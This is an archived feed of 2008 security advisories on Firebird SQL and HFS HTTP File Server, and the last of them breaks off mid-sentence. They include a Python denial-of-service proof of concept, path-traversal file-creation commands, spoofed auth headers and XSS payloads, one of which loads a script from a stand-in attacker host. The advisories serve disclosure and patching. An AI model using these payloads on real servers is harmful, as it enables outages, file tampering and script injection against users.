	<link rel="alternate" type="text/html" href="http://old.nabble.com/Cisco-Security-Advisory%3A-Cisco-Wireless-Control-System-Tomcat-mod_jk.so-Vulnerability-tp15213266p15213266.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-15142809</id>
	<title>CORE-2007-1219: Firebird Remote Memory Corruption</title>
	<published>2008-01-28T09:32:00Z</published>
	<updated>2008-01-28T09:32:00Z</updated>
	<author>
		<name>Core Security Technologies Advisories</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;Core Security Technologies - CoreLabs Advisory
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.coresecurity.com/corelabs&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/corelabs&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Firebird Remote Memory Corruption
&lt;br&gt;&lt;br&gt;*Advisory Information*
&lt;br&gt;&lt;br&gt;Title: Firebird Remote Memory Corruption
&lt;br&gt;Advisory ID: &amp;nbsp;CORE-2007-1219
&lt;br&gt;Advisory URL: &lt;a href=&quot;http://www.coresecurity.com/?action=item&amp;id=2095&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/?action=item&amp;id=2095&lt;/a&gt;&lt;br&gt;Date published: 2008-01-28
&lt;br&gt;Date of last update: 2008-01-24
&lt;br&gt;Vendors contacted: Firebird SQL
&lt;br&gt;Release mode: Coordinated Release
&lt;br&gt;&lt;br&gt;*Vulnerability Information*
&lt;br&gt;&lt;br&gt;Class: Memory corruption
&lt;br&gt;Remotely Exploitable: Yes
&lt;br&gt;Locally Exploitable: Yes
&lt;br&gt;Bugtraq ID: 27403
&lt;br&gt;CVE Name: CVE-2008-0387
&lt;br&gt;&lt;br&gt;*Vulnerability Description*
&lt;br&gt;&lt;br&gt;Firebird [1][2] is a relational database that runs on Linux, Windows,
&lt;br&gt;and a variety of Unix platforms. The Firebird Project is a commercially
&lt;br&gt;independent project of C and C++ programmers, technical advisors and
&lt;br&gt;supporters developing and enhancing a multi-platform relational database
&lt;br&gt;management system based on the source code released by Inprise Corp (now
&lt;br&gt;known as Borland Software Corp) on 25 July, 2000.
&lt;br&gt;&lt;br&gt;The Firebird database manager contains an Integer Overflow in the
&lt;br&gt;processing of certain tags on the XDR protocol used for communication
&lt;br&gt;with the server. This led the server to corrupt the process memory and
&lt;br&gt;crash. Repeated attempts are followed by a crash of the process in
&lt;br&gt;charge of restarting the database server. This may also grant attackers
&lt;br&gt;remote execution of arbitrary code on servers running Firebird.
&lt;br&gt;&lt;br&gt;*Vulnerable packages*
&lt;br&gt;&lt;br&gt;. Firebird SQL 1.0.3 and before.
&lt;br&gt;. Firebird SQL 1.5.5 and before.
&lt;br&gt;. Firebird SQL 2.0.3 and before.
&lt;br&gt;. Firebird SQL 2.1.0 Beta 2 and before.
&lt;br&gt;&lt;br&gt;*Non-vulnerable packages*
&lt;br&gt;&lt;br&gt;. Firebird SQL 1.5.6 (to be released)
&lt;br&gt;. Firebird SQL 2.0.4 (to be released)
&lt;br&gt;. Firebird SQL 2.1.0 RC1
&lt;br&gt;&lt;br&gt;*Vendor Information, Solutions and Workarounds*
&lt;br&gt;&lt;br&gt;Firebird v2.1.0 RC1 fixes this vulnerability and is available for
&lt;br&gt;download at &lt;a href=&quot;http://firebirdsql.org/index.php?op=files&amp;id=fb210_RC1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://firebirdsql.org/index.php?op=files&amp;id=fb210_RC1&lt;/a&gt;&lt;br&gt;&lt;br&gt;The fix will also be included in versions v1.5.6 and v2.0.4. &amp;nbsp;Version
&lt;br&gt;2.0.4 will be released in February. The version 1.5.6 release is
&lt;br&gt;expected later this year.
&lt;br&gt;&lt;br&gt;The issue is registered [3] in Firebird Tracker as CORE-1681.
&lt;br&gt;&lt;br&gt;*Credits*
&lt;br&gt;&lt;br&gt;This vulnerability was discovered and researched by Damian Frizza with
&lt;br&gt;assistance of Alfredo Ortega from Core Security Technologies.
&lt;br&gt;&lt;br&gt;*Technical Description / Proof of Concept Code*
&lt;br&gt;&lt;br&gt;The memory corruption happens when the parser (src/remote/protocol.cpp)
&lt;br&gt;receives any of the following operations with invalid data:
&lt;br&gt;&lt;br&gt;op_receive
&lt;br&gt;op_start
&lt;br&gt;op_start_and_receive
&lt;br&gt;op_send
&lt;br&gt;op_start_and_send
&lt;br&gt;op_start_send_and_receive
&lt;br&gt;&lt;br&gt;The parser fails to properly sanitize certain variables before use. We
&lt;br&gt;can see that in the file src/remote/protocol.cpp there are the following
&lt;br&gt;assignments directly from the packet buffer to the data structure,
&lt;br&gt;without any validation (The MAP macro doesn't have any range checking):
&lt;br&gt;&lt;br&gt;src/remote/protocol.cpp:417
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MAP(xdr_short, reinterpret_cast&amp;lt;SSHORT&amp;&amp;gt;(data-&amp;gt;p_data_request));
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MAP(xdr_short, reinterpret_cast&amp;lt;SSHORT&amp;&amp;gt;(data-&amp;gt;p_data_incarnation));
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MAP(xdr_short, reinterpret_cast&amp;lt;SSHORT&amp;&amp;gt;(data-&amp;gt;p_data_transaction));
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MAP(xdr_short, reinterpret_cast&amp;lt;SSHORT&amp;&amp;gt;(data-&amp;gt;p_data_message_number));
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; /* Changes to this op's protocol must mirror in xdr_protocol_overhead */
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; return xdr_request(xdrs, data-&amp;gt;p_data_request,
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; data-&amp;gt;p_data_message_number,
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; data-&amp;gt;p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p);
&lt;br&gt;&lt;br&gt;And in the function xdr_request(), the variable data-&amp;gt;p_data_request (as
&lt;br&gt;request_id) is used to index an array:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; ...
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; rrq* request = (rrq*) port-&amp;gt;port_objects[request_id];
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; ...
&lt;br&gt;&lt;br&gt;Corrupting memory structures and causing a DoS of the server, with
&lt;br&gt;possible execution of code. The same happens with the variable
&lt;br&gt;data-&amp;gt;p_data_message_number.
&lt;br&gt;&lt;br&gt;The following python PoC causes a remote Denial of service and
&lt;br&gt;demonstrates the bug:
&lt;br&gt;&lt;br&gt;##Firebird DoS
&lt;br&gt;##Damian Frizza - Core Security Exploit Writers Team
&lt;br&gt;##tested against Firebird-2.0.3.12981-1-Win32.exe and
&lt;br&gt;##Firebird-2.1.0.16780_0_Win32.exe
&lt;br&gt;&lt;br&gt;##fbserver.exe 2.0.3
&lt;br&gt;##005637D0 &amp;nbsp; 8B4424 08 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;MOV EAX,DWORD PTR SS:[ESP+8]
&lt;br&gt;##005637D4 &amp;nbsp; 0FB700 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MOVZX EAX,WORD PTR DS:[EAX]
&lt;br&gt;##005637D7 &amp;nbsp; 83EC 50 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;SUB ESP,50
&lt;br&gt;##005637DA &amp;nbsp; 56 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; PUSH ESI
&lt;br&gt;##005637DB &amp;nbsp; 8BF1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MOV ESI,ECX
&lt;br&gt;##005637DD &amp;nbsp; 8B8E AC000000 &amp;nbsp; &amp;nbsp;MOV ECX,DWORD PTR DS:[ESI+AC]
&lt;br&gt;##005637E3 &amp;nbsp; 3B41 08 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;CMP EAX,DWORD PTR DS:[ECX+8] &amp;nbsp; &amp;nbsp; &amp;lt;----
&lt;br&gt;##CRASH HERE
&lt;br&gt;&lt;br&gt;&lt;br&gt;import socket
&lt;br&gt;import time
&lt;br&gt;&lt;br&gt;def getTargetIP():
&lt;br&gt;&amp;nbsp; &amp;nbsp; return '192.168.xxx.xxx'
&lt;br&gt;&lt;br&gt;&lt;br&gt;port= 3050
&lt;br&gt;op = '\x4a'
&lt;br&gt;&lt;br&gt;&lt;br&gt;packet = '\x00\x00\x00' + op + &amp;nbsp;'A' * 2000
&lt;br&gt;&lt;br&gt;&lt;br&gt;##Making the connection and sending the data 5 times, fbguard.exe fails
&lt;br&gt;##to restart the service.
&lt;br&gt;&lt;br&gt;for i in range(0, 5):
&lt;br&gt;&amp;nbsp; &amp;nbsp; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
&lt;br&gt;&amp;nbsp; &amp;nbsp; s.connect((getTargetIP(), port))
&lt;br&gt;&amp;nbsp; &amp;nbsp; s.send(str(packet))
&lt;br&gt;&amp;nbsp; &amp;nbsp; s.close()
&lt;br&gt;&amp;nbsp; &amp;nbsp; time.sleep(1)
&lt;br&gt;&lt;br&gt;*Report Timeline*
&lt;br&gt;&lt;br&gt;2008-01-04: Initial notification sent by CoreLabs to Firebird SQL
&lt;br&gt;development team.
&lt;br&gt;2008-01-08: Notification acknowledged by Firebird SQL development team.
&lt;br&gt;2008-01-08: Technical details sent by Core to Firebird SQL dev. team.
&lt;br&gt;2008-01-10: Firebird SQL dev. team notifies Core that a fix has been
&lt;br&gt;produced, and will be released in Firebird versions v1.5.6, v2.0.4 and
&lt;br&gt;v2.1.0 RC1.
&lt;br&gt;2008-01-10: CoreLabs acknowledges information about fixes and requests
&lt;br&gt;date of the v2.1.0 RC1 release to the Firebird dev. team.
&lt;br&gt;2008-01-15: Firebird dev. team confirms vendor information and dates of
&lt;br&gt;fixed versions.
&lt;br&gt;&lt;br&gt;&lt;br&gt;*References*
&lt;br&gt;&lt;br&gt;[1] &lt;a href=&quot;http://sourceforge.net/projects/firebird/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://sourceforge.net/projects/firebird/&lt;/a&gt;&lt;br&gt;[2] &lt;a href=&quot;http://www.firebirdsql.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.firebirdsql.org/&lt;/a&gt;&lt;br&gt;[3] &lt;a href=&quot;http://tracker.firebirdsql.org/browse/CORE-1681&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://tracker.firebirdsql.org/browse/CORE-1681&lt;/a&gt;&lt;br&gt;&lt;br&gt;*About Corelabs*
&lt;br&gt;&lt;br&gt;CoreLabs, the research center of Core Security Technologies, is charged
&lt;br&gt;with anticipating the future needs and requirements for information
&lt;br&gt;security technologies.
&lt;br&gt;We conduct our research in several important areas of computer security
&lt;br&gt;including system vulnerabilities, cyber attack planning and simulation,
&lt;br&gt;source code auditing, and cryptography. Our results include problem
&lt;br&gt;formalization, identification of vulnerabilities, novel solutions and
&lt;br&gt;prototypes for new technologies.
&lt;br&gt;CoreLabs regularly publishes security advisories, technical papers,
&lt;br&gt;project information and shared software tools for public use at:
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com/corelabs/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/corelabs/&lt;/a&gt;&lt;br&gt;&lt;br&gt;*About Core Security Technologies*
&lt;br&gt;&lt;br&gt;Core Security Technologies develops strategic solutions that help
&lt;br&gt;security-conscious organizations worldwide develop and maintain a
&lt;br&gt;proactive process for securing their networks. The company's flagship
&lt;br&gt;product, CORE IMPACT, is the most comprehensive product for performing
&lt;br&gt;enterprise security assurance testing. IMPACT evaluates network,
&lt;br&gt;endpoint and end-user vulnerabilities and identifies what resources are
&lt;br&gt;exposed. It enables organizations to determine if current security
&lt;br&gt;investments are detecting and preventing attacks. Core augments its
&lt;br&gt;leading technology solution with world-class security consulting
&lt;br&gt;services, including penetration testing and software security auditing.
&lt;br&gt;Based in Boston, MA and Buenos Aires, Argentina, Core Security
&lt;br&gt;Technologies can be reached at 617-399-6980 or on the Web at
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com&lt;/a&gt;&amp;nbsp;.
&lt;br&gt;&lt;br&gt;*DISCLAIMER*
&lt;br&gt;&lt;br&gt;The contents of this advisory are copyright (c) 2008 CORE Security
&lt;br&gt;Technologies and (c) 2008 CoreLabs, and may be distributed freely
&lt;br&gt;provided that no fee is charged for this distribution and proper credit
&lt;br&gt;is given.
&lt;br&gt;&lt;br&gt;*PGP/GPG KEYS*
&lt;br&gt;&lt;br&gt;This advisory has been signed with the GPG key of Core Security
&lt;br&gt;Technologies advisories team, which is available for download at
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com/files/attachments/core_security_advisories.asc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/files/attachments/core_security_advisories.asc&lt;/a&gt;&lt;br&gt;&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.6 (MingW32)
&lt;br&gt;Comment: Using GnuPG with Mozilla - &lt;a href=&quot;http://enigmail.mozdev.org&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://enigmail.mozdev.org&lt;/a&gt;&lt;br&gt;&lt;br&gt;iD8DBQFHnhGQyNibggitWa0RAjcmAJ94rGoTbUBQALmV5yOudJfL4B038QCgpzNw
&lt;br&gt;dFwDpUnOO6OHI0L45rIwyFU=
&lt;br&gt;=dlYg
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/CORE-2007-1219%3A-Firebird-Remote-Memory-Corruption-tp15142809p15142809.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-15054797</id>
	<title>Syhunt: HFS (HTTP File Server) Username Spoofing and Log Forging/Injection Vulnerability</title>
	<published>2008-01-23T09:50:57Z</published>
	<updated>2008-01-23T09:50:57Z</updated>
	<author>
		<name>Alec Storm</name>
	</author>
	<content type="html">Syhunt: HFS (HTTP File Server) Username Spoofing and Log
&lt;br&gt;Forging/Injection Vulnerability
&lt;br&gt;&lt;br&gt;Advisory-ID: 200801163
&lt;br&gt;Discovery Date: 1.16.2008
&lt;br&gt;Release Date: 1.23.2008
&lt;br&gt;Affected Applications: HFS 1.5g to and including 2.3(Beta Build
&lt;br&gt;#174); and possibly HFS version 1.5f
&lt;br&gt;Non-Affected Applications: HFS 1.5e and earlier versions
&lt;br&gt;Class: Log Forging/Injection, Username Spoofing
&lt;br&gt;Status: Patch available/Vendor informed
&lt;br&gt;Vendor: Massimo Melina
&lt;br&gt;Vendor URL: &lt;a href=&quot;http://www.rejetto.com/hfs&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.rejetto.com/hfs&lt;/a&gt;&amp;nbsp;-or- hfs.sourceforge.net
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has
&lt;br&gt;assigned the following CVEs to these vulnerabilities:
&lt;br&gt;* CVE-2008-0407 - Username Spoofing Vulnerability
&lt;br&gt;* CVE-2008-0408 - Log Forging / Injection Vulnerability
&lt;br&gt;&lt;br&gt;----------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Overview:
&lt;br&gt;HFS is a very popular open source HTTP server designed for
&lt;br&gt;easily sharing files. According to information on the official
&lt;br&gt;website, the HTTP File Server software has been downloaded about
&lt;br&gt;2 million times.
&lt;br&gt;&lt;br&gt;Description:
&lt;br&gt;HFS versions 1.5g to 2.3 Beta (and possibly version 1.5f) are
&lt;br&gt;vulnerable to log forging and username spoofing vulnerabilities.
&lt;br&gt;Remote attackers can appear to be logged in with any desired
&lt;br&gt;username or perform log injection in the log file and GUI panel.
&lt;br&gt;Technical details are included below.
&lt;br&gt;&lt;br&gt;----------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Details (Replicating the issues):
&lt;br&gt;1) Log Forging / Injection Vulnerability
&lt;br&gt;&lt;a href=&quot;http://www.syhunt.com/advisories/hfshack.txt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.syhunt.com/advisories/hfshack.txt&lt;/a&gt;&lt;br&gt;See the &amp;quot;maniplog&amp;quot; command
&lt;br&gt;&lt;br&gt;maniplog [localfilename]
&lt;br&gt;This will inject the content of [localfilename] to the HFS log
&lt;br&gt;panel and file.
&lt;br&gt;&lt;br&gt;2) Username Spoofing Vulnerability
&lt;br&gt;a. Login at http://[host]/~login as [user_x]. Then request
&lt;br&gt;(using a web browser): http://[user_y]:[anywrongpwd]@[host]/
&lt;br&gt;--or--
&lt;br&gt;b. send a direct request in the following format (does not
&lt;br&gt;require previous login):
&lt;br&gt;GET / HTTP/1.1
&lt;br&gt;(...)
&lt;br&gt;Authorization: Basic dXNlcl95
&lt;br&gt;&lt;br&gt;Both alternatives could make an admin to believe that user Y has
&lt;br&gt;made the HTTP request when reviewing logs.
&lt;br&gt;&lt;br&gt;Additional Considerations:
&lt;br&gt;* Vulnerabilities described here will not allow browsing
&lt;br&gt;protected files and folders.
&lt;br&gt;&lt;br&gt;----------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Vulnerability Status:
&lt;br&gt;The author was contacted and HFS version 2.2c was released. The
&lt;br&gt;new version can be downloaded at www.rejetto.com/hfs/download or
&lt;br&gt;via the &amp;quot;Check for news/updates&amp;quot; option in the HFS menu.
&lt;br&gt;&lt;br&gt;Testers of HFS 2.3 Beta should upgrade to the latest 2.3 beta
&lt;br&gt;build.
&lt;br&gt;&lt;br&gt;HFS 2.3 Beta is only affected if the option &amp;quot;Accept any login
&lt;br&gt;for unprotected resources&amp;quot; is enabled. This option, introduced
&lt;br&gt;in this version, is disabled by default.
&lt;br&gt;&lt;br&gt;----------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Credit:
&lt;br&gt;Felipe Aragon and Alec Storm
&lt;br&gt;Syhunt Security Research Team, www.syhunt.com
&lt;br&gt;&lt;br&gt;---
&lt;br&gt;&lt;br&gt;Copyright © 2008 Syhunt Security
&lt;br&gt;&lt;br&gt;Disclaimer:
&lt;br&gt;The information in this advisory is provided &amp;quot;as is&amp;quot; without
&lt;br&gt;warranty of any kind. Details provided are strictly for
&lt;br&gt;educational and defensive purposes.
&lt;br&gt;&lt;br&gt;Syhunt is not liable for any damages caused by direct or
&lt;br&gt;indirect use of the information provided by this advisory.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Syhunt%3A-HFS-%28HTTP-File-Server%29-Username-Spoofing-and-Log-Forging-Injection-Vulnerability-tp15054797p15054797.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-15053811</id>
	<title>Syhunt: HFS (HTTP File Server) Log Arbitrary File/Directory Manipulation and Denial-of-Service Vulnerabilities</title>
	<published>2008-01-23T09:49:51Z</published>
	<updated>2008-01-23T09:49:51Z</updated>
	<author>
		<name>Alec Storm</name>
	</author>
	<content type="html">Syhunt: HFS (HTTP File Server) Log Arbitrary File/Directory
&lt;br&gt;Manipulation and Denial-of-Service Vulnerabilities
&lt;br&gt;&lt;br&gt;Advisory-ID: 200801162
&lt;br&gt;Discovery Date: 1.16.2008
&lt;br&gt;Release Date: 1.23.2008
&lt;br&gt;Affected Applications: HFS 2.2 to and including 2.3(Beta Build
&lt;br&gt;#174)
&lt;br&gt;Non-Affected Applications: HFS 2.1d and earlier versions
&lt;br&gt;Class: Arbitrary File/Directory Manipulation, Denial of Service
&lt;br&gt;Status: Patch available/Vendor informed
&lt;br&gt;Vendor: Massimo Melina
&lt;br&gt;Vendor URL: &lt;a href=&quot;http://www.rejetto.com/hfs&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.rejetto.com/hfs&lt;/a&gt;&amp;nbsp;-or- hfs.sourceforge.net
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has
&lt;br&gt;assigned the following CVEs to these vulnerabilities:
&lt;br&gt;* CVE-2008-0405 - Arbitrary File/Folder Creation Vulnerability
&lt;br&gt;* CVE-2008-0406 - Denial of Service (DoS) Vulnerability
&lt;br&gt;&lt;br&gt;----------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Overview:
&lt;br&gt;HFS is a very popular open source HTTP server designed for
&lt;br&gt;easily sharing files. According to information on the official
&lt;br&gt;website, the HTTP File Server software has been downloaded about
&lt;br&gt;2 million times.
&lt;br&gt;&lt;br&gt;Description:
&lt;br&gt;HFS (versions 2.2 to 2.3 beta) will not check if an account name
&lt;br&gt;provided during navigation exists or contains any invalid chars
&lt;br&gt;before logging information about a request. This is specially
&lt;br&gt;dangerous if the server has been configured to use account names
&lt;br&gt;as log filenames.
&lt;br&gt;&lt;br&gt;In this case, a remote attacker can use this flaw to create
&lt;br&gt;arbitrary files, append data to arbitrary files, create
&lt;br&gt;arbitrary folders or launch a DoS attack against the server.
&lt;br&gt;Technical details are included below.
&lt;br&gt;&lt;br&gt;----------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Details (Replicating the issues):
&lt;br&gt;1) Arbitrary File/Directory Manipulation Vulnerability
&lt;br&gt;&lt;a href=&quot;http://www.syhunt.com/advisories/hfshack.txt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.syhunt.com/advisories/hfshack.txt&lt;/a&gt;&lt;br&gt;See the &amp;quot;mkd&amp;quot; and &amp;quot;manipf&amp;quot; commands
&lt;br&gt;&lt;br&gt;Example 1 - Arbitrary Directory Creation:
&lt;br&gt;If HFS is running (for e.g.) in the C:\HFS directory, you can
&lt;br&gt;create the C:\Syhunt\ directory by entering:
&lt;br&gt;mkd ..\Syhunt
&lt;br&gt;&lt;br&gt;Example 2 - Arbitrary File Creation/Manipulation:
&lt;br&gt;manipf [localfilename] [remotefilename]
&lt;br&gt;manipf inject.html ..\Syhunt\index.html
&lt;br&gt;&lt;br&gt;This example would create the file &amp;quot;C:\Syhunt\index.html&amp;quot; and
&lt;br&gt;append the content of the file &amp;quot;inject.html&amp;quot; to it.
&lt;br&gt;&lt;br&gt;2) Denial of Service (DoS) Vulnerability
&lt;br&gt;&lt;a href=&quot;http://www.syhunt.com/advisories/hfshack.txt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.syhunt.com/advisories/hfshack.txt&lt;/a&gt;&lt;br&gt;&amp;quot;checkdos&amp;quot; command
&lt;br&gt;&lt;br&gt;* HFS will close immediately after receiving the DoS request
&lt;br&gt;&lt;br&gt;* This issue is related to Windows limitations with long
&lt;br&gt;filenames. XP has a limit of 255 characters; Windows Vista a 260
&lt;br&gt;chars limit.
&lt;br&gt;&lt;br&gt;----------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Vulnerability Status:
&lt;br&gt;The vendor was contacted and has immediately released HFS 2.2c
&lt;br&gt;which fixes these problems. The new version can be downloaded at
&lt;br&gt;www.rejetto.com/hfs/download or via the &amp;quot;Check for news/updates&amp;quot;
&lt;br&gt;option in the HFS menu.
&lt;br&gt;&lt;br&gt;As a workaround for the affected releases, users can temporarily
&lt;br&gt;disable the logging feature or remove the %user% symbol from the
&lt;br&gt;log filename.
&lt;br&gt;&lt;br&gt;Testers of HFS 2.3 Beta should upgrade to the latest 2.3 beta
&lt;br&gt;build.
&lt;br&gt;&lt;br&gt;HFS 2.3 Beta specifically is only affected if the option
&lt;br&gt;&amp;quot;Accept any login for unprotected resources&amp;quot; is enabled. This
&lt;br&gt;option, introduced in this version, is disabled by default.
&lt;br&gt;&lt;br&gt;----------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Credit:
&lt;br&gt;Felipe Aragon and Alec Storm
&lt;br&gt;Syhunt Security Research Team, www.syhunt.com
&lt;br&gt;&lt;br&gt;---
&lt;br&gt;&lt;br&gt;Copyright © 2008 Syhunt Security
&lt;br&gt;&lt;br&gt;Disclaimer:
&lt;br&gt;The information in this advisory is provided &amp;quot;as is&amp;quot; without
&lt;br&gt;warranty of any kind. Details provided are strictly for
&lt;br&gt;educational and defensive purposes.
&lt;br&gt;&lt;br&gt;Syhunt is not liable for any damages caused by direct or
&lt;br&gt;indirect use of the information provided by this advisory.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Syhunt%3A-HFS-%28HTTP-File-Server%29-Log-Arbitrary-File-Directory-Manipulation-and-Denial-of-Service-Vulnerabilities-tp15053811p15053811.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-15052276</id>
	<title>Syhunt: HFS (HTTP File Server) Template Cross-Site Scripting and Information Disclosure Vulnerabilities</title>
	<published>2008-01-23T09:48:38Z</published>
	<updated>2008-01-23T09:48:38Z</updated>
	<author>
		<name>Alec Storm</name>
	</author>
	<content type="html">Syhunt: HFS (HTTP File Server) Template Cross-Site Scripting and
&lt;br&gt;Information Disclosure Vulnerabilities
&lt;br&gt;&lt;br&gt;Advisory-ID: 200801161
&lt;br&gt;Discovery Date: 1.16.2008
&lt;br&gt;Release Date: 1.23.2008
&lt;br&gt;Affected Applications: HFS 2.0 to and including 2.3(Beta Build
&lt;br&gt;#174)
&lt;br&gt;Non-Affected Applications: HFS 1.6a and earlier versions
&lt;br&gt;Class: Cross-Site Scripting (XSS), Information Disclosure
&lt;br&gt;Status: Patch available/Vendor informed
&lt;br&gt;Vendor: Massimo Melina
&lt;br&gt;Vendor URL: &lt;a href=&quot;http://www.rejetto.com/hfs&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.rejetto.com/hfs&lt;/a&gt;&amp;nbsp;-or- hfs.sourceforge.net
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has
&lt;br&gt;assigned the following CVEs to these vulnerabilities:
&lt;br&gt;* CVE-2008-0409 - Cross-Site Scripting (XSS) and Host Field XSS
&lt;br&gt;* CVE-2008-0410 - Information Disclosure Vulnerability
&lt;br&gt;&lt;br&gt;----------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Overview:
&lt;br&gt;HFS is a very popular open source HTTP server designed for
&lt;br&gt;easily sharing files. According to information on the official
&lt;br&gt;website, the HTTP File Server software has been downloaded about
&lt;br&gt;2 million times.
&lt;br&gt;&lt;br&gt;Description:
&lt;br&gt;When a specific URL is visited, HFS displays a non-existent
&lt;br&gt;account name in the response body. This non-existent account
&lt;br&gt;name can be HTML code, allowing a remote attacker to use this
&lt;br&gt;to launch XSS attacks.
&lt;br&gt;&lt;br&gt;Because the HTML code is also recognized by the web server as a
&lt;br&gt;HFS HTML template, it is also possible to inject symbols to
&lt;br&gt;force HFS to reveal details about the server (eg, current HFS
&lt;br&gt;server version, build, connections, timestamp, uptime, current
&lt;br&gt;outbound and inbound speed, and more). Technical details are
&lt;br&gt;included below.
&lt;br&gt;&lt;br&gt;----------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Details (Replicating the issues):
&lt;br&gt;&lt;br&gt;1) Cross-Site Scripting (XSS) and Host Field XSS Vulnerabilities
&lt;br&gt;Example 1 - Launching a basic XSS:
&lt;br&gt;http://&amp;lt;script&amp;gt;alert('Syhunt%20XSS')&amp;lt;%2fscript&amp;gt;a:x@[host]/
&lt;br&gt;&lt;br&gt;Example 2 - Injecting an external script (A mix of encoding and
&lt;br&gt;javascript functions is used here to circumvent browser
&lt;br&gt;URL limitations):
&lt;br&gt;http://&amp;lt;script&amp;gt;var%20sChar=String%2efromCharCode(58)%3bdocument
&lt;br&gt;%2ewrite('&amp;lt;script%20src=http'+sChar+'%2f%2fwww%2eattacker%2ecom
&lt;br&gt;%2fxss%2ejs&amp;gt;&amp;lt;%5c%2fscript&amp;gt;')%3b&amp;lt;%2fscript&amp;gt;a:x@[host]/
&lt;br&gt;&lt;br&gt;* This is specially dangerous if launched against Firefox. In
&lt;br&gt;order to protect the password from prying eyes, Firefox entirely
